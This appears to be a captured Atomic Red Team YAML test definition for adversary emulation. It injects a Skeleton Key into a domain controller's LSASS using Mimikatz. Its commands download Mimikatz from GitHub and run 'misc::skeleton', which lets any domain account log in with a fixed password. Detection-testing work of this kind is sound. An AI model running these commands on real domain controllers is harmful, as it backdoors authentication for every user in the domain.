security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3d22e294da97d4dc82fc4c0fbca9ee6ebed10dbb
atomic-red-team/atomics/T1556.001/T1556.001.yaml
T
Atomic Red Team doc generator 3d22e294da Generated docs from job=generate-docs branch=master [ci skip]
2026-04-16 03:09:01 +00:00

48 lines
2.1 KiB
YAML
Raw Blame History

attack_technique: T1556.001
display_name: 'Modify Authentication Process: Domain Controller Authentication'
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at #{mimikatz_path}
prereq_command: |
if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: |
& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink